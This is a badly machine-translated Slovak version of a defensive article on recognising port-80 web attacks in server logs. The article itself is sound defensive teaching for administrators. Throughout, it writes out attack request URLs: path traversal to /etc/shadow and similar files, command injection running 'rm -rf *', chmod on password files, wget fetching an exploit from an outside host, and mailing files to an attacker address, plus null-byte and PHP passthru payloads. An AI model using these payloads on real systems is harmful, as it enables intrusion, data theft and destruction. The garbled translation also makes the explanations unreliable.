I. Zhrnutie
II. Podrobný popis
III. Ďalšie
IV. Vedľajšie účinky analýza
V. Prevod kódovanie
VI. Záver
[Abstract]
Webové stránky 80 ako predvolený port služby, o jeho bezpečnosti naďalej uvoľniť, Zhongyi Xie tieto chyby dokonca byť využité na získanie oprávnenia správcu Jinru stránky Neibu, tieto sú Zenomorph pair na 80 modelov port hrozba nejaké stopy z výskumu, a povedať, ako nájsť problémy z log záznamov.
[Detail]
Nasledujúca časť cez Niektorí prejavujú Liezi na web server a jeho aplikácie na generálny útok, a stopy po týchto Liezi len je hlavným zástupcom útoku a nie zoznam všetkých útok formulára, bude tento bod podrobný opis úlohy každého útoku, a jeho, ako tieto chyby zneužiť na útok.
(1) "." ".." A "..." dotaz
Stopy týchto útokov sú veľmi bežné pre webové aplikácie a webový server, ktorý slúži k útočníkovi alebo červ-virus program zmeniť webový server na cestu, aby získal prístup do uzavretých oblastí. Väčšina CGI programov s týmito nedostatkami, ".." dotaz.
Príklad:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
To ukazuje, útočník Liezi žiadosť mosd tento súbor, v prípade, že útočník schopnosť prielom web server koreňovom adresári, potom dostanete viac informácií a získanie ďalších výhod.
(2) "% 20" žiadosť
% 20 je hex hodnota, ktorá o 16 miest, aj keď to neznamená, že môžete použiť čokoľvek, ale pri zobrazení log nájde to, niektoré webového servera beží na tejto povahy, môžu byť účinné vykonávanie Preto by ste mali starostlivo preskúmať log. Na druhú stranu, môže požiadať niekedy pomôže vykonávať niektoré príkazy.
Príklad:
http://host/cgi-bin/lame.cgi?page=ls% 20-al |
Tento Liezi ukazuje útočník spustiť príkazové, zoznam celého katalógu požadovaných dokumentov, pôsobiť útočník prístup k dôležitým súborom na vašom systéme, aby mu pomohol k ďalšiemu zabezpečiť podmienky pre získanie oprávnenia.
(3) "% 00" žiadosť
% 00 povedal, že 16-byte hexadecimálny prázdny, on bol schopný oklamať webové aplikácie, a požiadať o iné typy súborov.
Príklady:
http://host/cgi-bin/lame.cgi?page=index.html
To môže byť platný požiadavka na stroji, ak je útočník si vedomý táto žiadosť bola úspešná, bude sa ďalej hľadať cgi postupy.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Možno cgi program neprijme túto žiadosť, pretože to je požiadavka na kontrolu názvu súboru príponu, napríklad: html.shtml alebo iné typy súborov. Väčšina programov bude vám požadovaný typ súboru je neplatný, tentoraz to bude tell útočník požaduje súbor musí byť character of typu súboru príponu, so útočník môže dostať system cestu, názov súboru resulting v Váš systém viac citlivé informácie
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Pozornosť k tejto žiadosti, bude podvádzať CGI program, že tento dokument je stanoviť prijateľnú typy súborov, niektoré aplikácie účinných kontrol, ako hlúpy dotaz súbor, ktorý je bežne používané metódy útočníka.
(4) "|" Žiadosť
Jedná sa o potrubia charakter, v unixový systém, žiadosť o pomoc pri realizácii niekoľkých systémových príkazov naraz.
Príklad:
# Cat access_log | grep-i ".."
(Tento príkaz zobrazí log v ".." dotaz, bežne používané v útokoch a červy nájdených)
Často zistíte, že mnohé webové aplikácie využívajú tento znak, to tiež vedie k falošným poplachom v IDS protokolov.
V dôkladnom preskúmaní Vašej žiadosti, takže výhoda zníženie falošných poplachov v systéme detekcie prieniku.
Tu sú niektorí z liehu-tzu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Táto žiadosť príkaz, Nižšie sú uvedené niektoré zmeny v Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-al% 20/etc |
Táto požiadavka je uvedený v systéme Unix / etc adresár všetkých súborov
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep% 20-i% 20 "lame"
Prevedenie žiadosti mačky a grep príkaz príkaz sa bude vykonávať, pozrite sa na "lame"
(5) "," Žiadosť
V unix systémy, tento znak umožňuje viac príkazového riadku prevedení
Príklad:
# Id, Unam-a
(Implementácia id príkazu, nasleduje vykonanie príkazu UNAMA)
Niektoré webové program na tento znak, môže mať za následok vaše IDS Záznamy varovania zlyhania, mali by ste starostlivo skontrolovať web program, takže môžete znížiť riziko zlyhania záznamov IDS.
(6) " " a " " Žiadosť
By mala skontrolovať logy zaznamenávajú dva znaky, z mnohých dôvodov, z ktorých prvá je znak, že pridaná dáta v dokumente
Príklad 1:
# Echo "Vaša hax0red h0 h0" / etc / MOTD (MOTD žiadosť písomné informácie v tomto dokumente)
Útočník môže jednoducho využívať dotaz ako je uvedené vyššie manipulácia s vašej webovej stránky. Ako slávny RDS zneužiť útočník sa často používa k zmene webovej stránky.
Príklad 2:
http://host/something.php=Hi% 20mom% 20Im% 20Bold!
Html všimnete si, že reč symbolov tu, on tiež strávil " "," " znaky, ako útoky nemôžu spôsobiť útočníkovi prístup k systému, zmätených ľudí, že to je legitímne Informácie o webe (vedúci k Ľudia navštívte túto stránku navštíviť útočník nastaviť adresu, môže byť táto žiadosť zakódované do 16 hex znakov vo forme, takže stopy po útoku nie je tak nápadná)
(7) "!" Žiadosť
Spoločný jazyk na tento znak žiadosť SS (Server Side include) I útok, ak je útočník útočník zmiasť užívateľ klikne na odkaz set, a rovnako ako vyššie.
Príklad:
http://host1/something.php =
Lieh-tzu je útok môže byť robiť to, aby sa stránky súbor host2 z host1 objaví hore (samozrejme vyžadujú návštevníci navštíviť útočníka nastavenia pripojenia. Táto žiadosť sa môže premeniť 16 hex kódovanie maska, nie je ľahké nájsť)
Zároveň možno tento prístup aj príkazom orgánu webové stránky
Príklad:
http://host/something.php =
Lieh-beží na vzdialenom systéme "id" príkazu, zobrazia webové stránky ID užívateľa, je zvyčajne "nobody" alebo "www"
Tento formulár umožňuje taktiež súčasťou skryté súbory.
Príklad:
http://host/something.php =
Skryté súbory. Htpasswd nebude zobrazená, bude Apache odmietnuť vytvoriť pravidlá pre. Ht formulár žiadosti, a SSI logo bude obísť takéto obmedzenia, a viesť k bezpečnostným problémom
(8) "," Žiadosť
Takéto útoky používajú k pokusu vzdialene vložiť PHP postupy webová aplikácia, môže povoliť vykonanie poradie v závislosti na nastavení servera, a ďalších faktorov na pracovisku (ako je PHP nastavené na bezpečný mód)
Príklad: http://host/something.php = passthru ("id ");?
V niektorých jednoduchých PHP aplikácie, môže byť na internetových stránkach na vzdialený systém práv užívateľov na vykonanie miestneho velenia
(9) "" "Žiadosť
Tento znak neskôr použiť na spúšťať príkazy v jazyku Perl, znaky webové aplikácie nie je často, takže ak ho vidíte vo svojom denníku, by mali byť opatrní
Príklad:
http://host/something.cgi = `id`
Napíšte perl CGI program v otázke viedlo k realizácii príkazu id
[Viac]
V nasledujúcej časti sa bude diskutovať o zavedenie viacerých útokov by mohla kontrolovať, spolu s požadovanú dokumentáciu, a ak máte vzdialené vykonanie príkazu chybu, by malo byť, ako kontrolovať objavu. Táto časť je len preto, aby vám bol dobrý nápad, a informujte svojho systému, čo sa deje, útočníci pokúsi zaútočiť na váš systém stop, ale nie je zoznam všetkých útočník použitia príkazov a žiadostí.
"/ Bin / ls"
Tento príkaz vyžaduje celú cestu, v mnohých webových aplikácií túto medzeru, ak sa prihlásite na mnohých miestach takejto žiadosti, je možné, aby veľké vzdialené spustenie príkazu chybu, ale nie nevyhnutne problém môže byť tiež falošný poplach. Opäť pripomenula, web písomnej žiadosti (CGI, ASP, PHP ... atď) je základom bezpečnosti
Príklad:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al |
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
Jedná sa okná shellu, pokiaľ útočník prístup a spustiť tento skript in server nastavenia pod podmienky umožnili v windows machine can do čokoľvek, veľa z červov je cez port 80, komunikácie vzdialeného počítača
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
Jedná sa o dva binárne súbory, jeho problémy a / bin / ls, ako, keď sa prihlásite na mnohých miestach takejto žiadosti, je možné, aby veľké vzdialené spustenie príkazu chybu, ale nie nevyhnutne problém môže byť tiež falošný poplach.
To ukáže, ktorá časť patrí ku ktorému užívateľov a skupín
Príklad:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
Tento príkaz môže mazať súbory bez toho, aby správne použitie je veľmi nebezpečné
Príklady:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-rf% 20 * |
http://host/cgi-bin/bad.cgi?doh=rm% 20-rf% 20 *;
"Wget a TFTP" command
Tieto príkazy sú často Útočník môže získať ďalšie povolenia pre sťahovanie súborov, wget je unix velenia pod, môže byť použitý na stiahnutie backdoors, tftp je pod velením Unix a NT, sa používa pre stiahnutie súboru. Niektorí IIS červami šíriť sa cez TFTP pre kopírovanie vírus na ostatných počítačoch
Príklady:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// hosť / cgi-bin / bad.cgi? Doh = wget% 20http: / / www.hwa-security.net/Phantasmp.c;
"Cat" command
Tento príkaz sa používa na zobrazenie obsahu súboru, ktorý sa používa na čítanie dôležité informácie, ako sú konfiguračné súbory, súbory heslo, kreditné súbory a dokumenty si môžete myslieť
Príklady: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi? Doh = mačka% 20/etc/motd;
"Echo" command
Tento príkaz slúži na zápis dát do súboru, napríklad "index.html"
Príklady: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "fc-# kivi% 20was% 20here"% 20 |% 200day.txt http://host/cgi-bin/bad.cgi?doh=echo% 20 "fc-# kivi% 20was% 20here"% 20 % 200day.txt;
"Ps" command
Zoznamy v súčasnosti beží proces, povedz, že útočník vzdialenom počítači beží softvér, aby bolo možné získať predstavu o bezpečnostných otázkach, získať ďalšie povolenie
Príklady: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. cgi? Doh = pz% 20-aux;
"Kill a killall" command
Unixové systémy za účelom zničenia tohto procesu, útočník môže použiť tento príkaz na zastavenie systémových služieb a procesov možno taktiež vymazať stopy útočník, niektorí zneužiť bude produkovať veľa detí procesov
Príklady: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill% 20 -9% 200;
"Unam" command
Tento príkaz hovorí útočník vzdialenom stroji meno, na nejakú dobu, a to prostredníctvom tejto webovej stránky s cieľom zistiť, ktoré ISP, útočník, ktorý je možné navštíviť aj dnes. Unam-a požiadať normálne, budú zaznamenané do log súboru
Príklady: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-a | http://host/cgi-bin/bad. cgi? Doh = Unam% 20-a;
"Cc, gcc, perl, python, etc ..." kompilácia / Výklad príkazu
Útočník cez wget, alebo tftp download využiť, a použitie cc, gcc kompilátora pre kompiláciu tohto do spustiteľného programu, a ďalšie prístupové oprávnenia
Príklady: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? Doh = gcc% 20Phantasmp.c;. / a.out% 20-p% 2031337;
Ak máte zobraziť protokoly nájsť v "perl" python "Tieto inštrukcie môžu byť vzdialený útočník na stiahnutie Perl, Python skript, a snažil sa získať povolenie miestneho
"Pošta" Príkaz
Útočníci často používajú tento príkaz systému, niektoré dôležité dokumenty, na útočníkov vlastnú poštovú schránku, ale aj ochotné e-mail bombové útoky sú vykonávané
Príklady: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org% 20
2.168.22.1;
"Chown, chmod, chgrp, chsh, etc ..." a ďalšie príkazy
Unixové systémy s cieľom umožniť im zmeniť oprávnenie k súborom
chown = umožňuje nastaviť vlastníka súboru chmod = umožňuje nastaviť povolenia k súborom chgrp = umožňuje vlastníkovi zmeniť skupine oprávnenia pre súbory chsh = dovolené meniť užívateľa shell
Príklady: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi? Doh = chmod% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd | http://host/cgi-bin/bad.cgi?doh=chsh% 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd" súbor
To je systém, heslo súbor, zvyčajne tieň preč, a neumožňuje vidieť šifrované heslo, ale jeden Útočník, ktorý by vedieť, čo sa is valid užívateľa a systému absolútnu cestu site name a ďalšie informácie, ako je zvyčajne tieňom off, takže útočník bude normálne vidieť / etc / shadow súbor
"/ Etc / master.passwd"
Tento súbor je systém BSD heslo súbor, obsahujúci zašifrované heslo, súbor na účet root len Read-Only, a niektorých nekvalifikovaných útočníkom otvoril jeho pokus s cieľom prečítať obsah vnútri., Ak sú webové stránky root povolenia na spustenie, potom útočník je, môžeme čítať obsah vnútri, veľa problémov na správcu systému príde jedna po druhej
"/ Etc / shadow"
Obsahuje heslo zašifrovanej systémom, prečítajte si rovnaký na root účet, a / et / master.passwd takmer
"/ Etc / MOTD"
Keď používatelia prihlásiť do systému UNIX, informácie sa objaví v "správu dňa" súbor, poskytuje dôležité informácie o systéme a správca užívateľov nejaký súbor, užívatelia, ktorí chcú vidieť tých, ktorí nie sú, obsahuje tiež verzia systému informácie, útočník obyčajne vidieť tento súbor, pochopiť, čo je systém beží na útočníka, je ďalším krokom k hľadanie tohto typu systému, využívať, a ďalej prístup do systému povolení
"/ Etc / hosts"
Tento dokument obsahuje IP adresu a informácie o sieti, útočník môže dozvedieť viac o systéme, nastavení siete
"/ Usr / local / apache / conf / httpd.conf"
Jedná sa o webový server Apache Konfiguračný súbor môže útočník chápať, ako je CGI, SSI a ďalšie informácie sú prístupné
"/ Etc / inetd.conf"
Toto je konfiguračný súbor inetd služby, útočník môže dozvedieť vzdialenom stroji, štart týchto služieb, a či je riadenie prístupu pomocou wrapper, ak zistíme, obálka funkčné, a útočník Ďalším krokom bude kontrolovať "/ etc / hosts.allow" a "/ etc / hosts.deny", súbor, a ktoré sa môžu meniť niektoré nastavenia, prístupové oprávnenia
". Htpasswd,. Htaccess, a. Htgroup"
Tieto súbory sa obvykle používajú v používateľskej overovanie webových serverov, by útočník prezeranie týchto súborov, a získať užívateľské meno a heslo, je heslo súbor. Htpasswd zašifrované, preraziť nejaký jednoduchý proces dešifrovania, umožniť útočníkovi získať prístup na stránky chránených území (zvyčajne užívateľ s rovnakým užívateľským menom a heslom, môže útočník dokonca navštíviť iný účet)
"Accessjog a error_log"
Jedná sa o apache server súbory log, útočníci často prezeranie týchto súborov, pozrite sa na tieto požiadavky sú zaznamenané tieto a ďalšie požiadavky na rôznych miestach
Typicky, útočník zmene týchto log súbory, ako sú jeho vlastné adrese, útočník cez port 80 cez váš systém a vaša záložný systém tiež nefunguje, neexistuje žiadny iný záznam program záznam o stave systému, ktorý by detekcie narušenia bezpečnosti sa stáva veľmi ťažké pracovať
"[Jednotka-listu]: winntrepairsam._ alebo [drive-listu]: winntrepairsam"
Windows NT systému heslom súborov, v prípade, že vzdialený príkaz nemôže byť realizovaný, budú útočníci obvykle požadujú tieto dokumenty, potom "l0pht crack", o druhu nástroja na prelomenie hesla na crack, ak sa útočník pokúsi zaútočiť na heslo správcu súborov, ak úspešný potom vzdialeného stroja bude útočník získava kontrolu
[Pretečenie analýza]
V tomto článku by som sa povedať príliš veľa o pretečeniu téme, budem rozdávať aké javy a stopy na pozoruhodné a zvláštne obavy, jeden buffer je often zaútočil na conversion code útočník a ťažko nájsť iné spôsoby, dosiahnutie
Tu je jednoduchý lež Zi
Príklad: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA aaaaaaaaa AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Zhege Liezi ukazuje útočníkovi odoslať danej Ying Yong veľa znakov, ktoré s testovacími metódami pretečeniu zásobníka, pretečenie bufferu Keyihuode vzdialenej Zhuji o prelínanie Zhixingquanxian, ak root setuid Hushuzhuwei postup, prepad, môžete získať prístup na celý systém, ak nie ako setuid program, potom pretečeniu iba spustením webových stránok užívateľských práv
Tu môže povedať všetkých okolností, ale mali by ste pravidelne skontrolovať súbor protokolu, ak tento deň sa zrazu našiel veľa žiadostí, ale zvyčajne nie viac ako request, znamená to, sú podrobené to pretečeniu attacks, samozrejme, môže byť tiež nová sieť worm útokov
[Prevod kódovanie]
Všetky útoky vyššie uvedenej žiadosti, útočník obyčajne vie, IDS systémy často mechanická kontrola dotaz, zvyčajne útočník bude používať dáta konverzný nástroj pre prevod požadovanej obsah vo formáte 16 pásme, čo vedie k IDS bude ignorovať tieto žiadosti, Sme oboznámení s zraniteľnosť CGI skenovací nástroj, ktorý je dobrý Liezi monofibrilovými. Ak máte zobraziť protokol času našiel veľký počet 16-kapela a nie niektoré spoločné znaky, potom útočník môže pokúsiť využiť niektoré z možností, ako zaútočiť na svoj systém
Priama metóda je, že váš súbor protokolu žiadosti o týchto 16 hex, skopírujte ho do vášho prehliadača, môžete prehliadač previesť právo požadovať, a zobrazí sa obsah žiadosti, ak nechcete odvahu, aby toto riziko, jednoduchý človek ASCII, vám môže poskytnúť správny kód.
[Záver]
Tento článok nemôže pokryť všetky 80 porty útok, však boli citované viac ako väčšina všeobecných útok, a povie vám, ako skontrolovať log súbory, a ako pridať ako je počet pravidiel IDS, napíšte jej cieľom je web správca systému by mal byť znepokojený what dobrý nápad na rovnakú dobu, ja dúfam, že tento článok pomôže to vývojárom web program na web písať better programy
OF POZNÁMKA: Ak máte nejaké pripomienky a návrhy, prosím pošlite e-mail admin@cgisecurity.com.